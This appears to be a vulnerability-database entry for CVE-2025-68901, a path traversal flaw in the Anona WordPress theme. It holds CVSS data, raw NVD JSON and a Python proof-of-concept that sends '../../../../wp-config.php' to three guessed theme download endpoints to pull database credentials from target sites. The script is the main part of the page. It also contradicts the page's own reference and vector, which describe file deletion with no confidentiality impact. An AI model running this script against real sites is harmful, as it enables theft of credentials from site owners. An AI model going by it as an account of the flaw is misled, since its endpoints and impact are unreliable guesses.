Security Vulnerability Report
中文
CVE-2025-68901 CVSS 8.6 HIGH

CVE-2025-68901

Published: 2026-01-22 17:16:14
Last Modified: 2026-04-27 19:16:38

Description

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AivahThemes Anona anona allows Path Traversal.This issue affects Anona: from n/a through <= 8.0.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Anona主题 <= 8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68901 PoC - Anona Theme Path Traversal # Target: WordPress site with vulnerable Anona theme def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-68901""" # Common vulnerable endpoints in Anona theme vulnerable_paths = [ '/wp-content/themes/anona/functions/download.php', '/wp-content/themes/anona/framework/download.php', '/wp-content/themes/anona/admin/download.php' ] # Path traversal payload to read wp-config.php payload = '../../../../wp-config.php' for path in vulnerable_paths: url = target_url.rstrip('/') + path params = { 'file': payload # Common parameter names: file, path, url, download } try: response = requests.get(url, params=params, timeout=10, verify=False) # Check if we got the config file content if 'DB_NAME' in response.text and 'DB_USER' in response.text: print(f'[+] VULNERABLE! Found wp-config.php at: {url}') print(f'[+] Response length: {len(response.text)} bytes') return True elif response.status_code == 200 and len(response.text) > 0: print(f'[*] Possible vulnerability at: {url}') print(f'[*] Status: {response.status_code}, Length: {len(response.text)}') except requests.exceptions.RequestException as e: print(f'[-] Error testing {url}: {e}') return False def main(): if len(sys.argv) < 2: print('Usage: python cve-2025-68901.py <target_url>') print('Example: python cve-2025-68901.py http://example.com') sys.exit(1) target = sys.argv[1] print(f'[*] Testing target: {target}') print(f'[*] CVE-2025-68901 - Anona Theme Path Traversal\n') if check_vulnerability(target): print('\n[!] Target is vulnerable to CVE-2025-68901') else: print('\n[*] Target may not be vulnerable or not using vulnerable version') if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68901", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:13.860", "lastModified": "2026-04-27T19:16:37.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AivahThemes Anona anona allows Path Traversal.This issue affects Anona: from n/a through <= 8.0."}, {"lang": "es", "value": "Limitación inadecuada de un nombre de ruta a un directorio restringido ('Salto de ruta') vulnerabilidad en AivahThemes Anona anona permite Salto de ruta. Este problema afecta a Anona: desde n/a hasta &lt;= 8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/anona/vulnerability/wordpress-anona-theme-8-0-arbitrary-file-deletion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}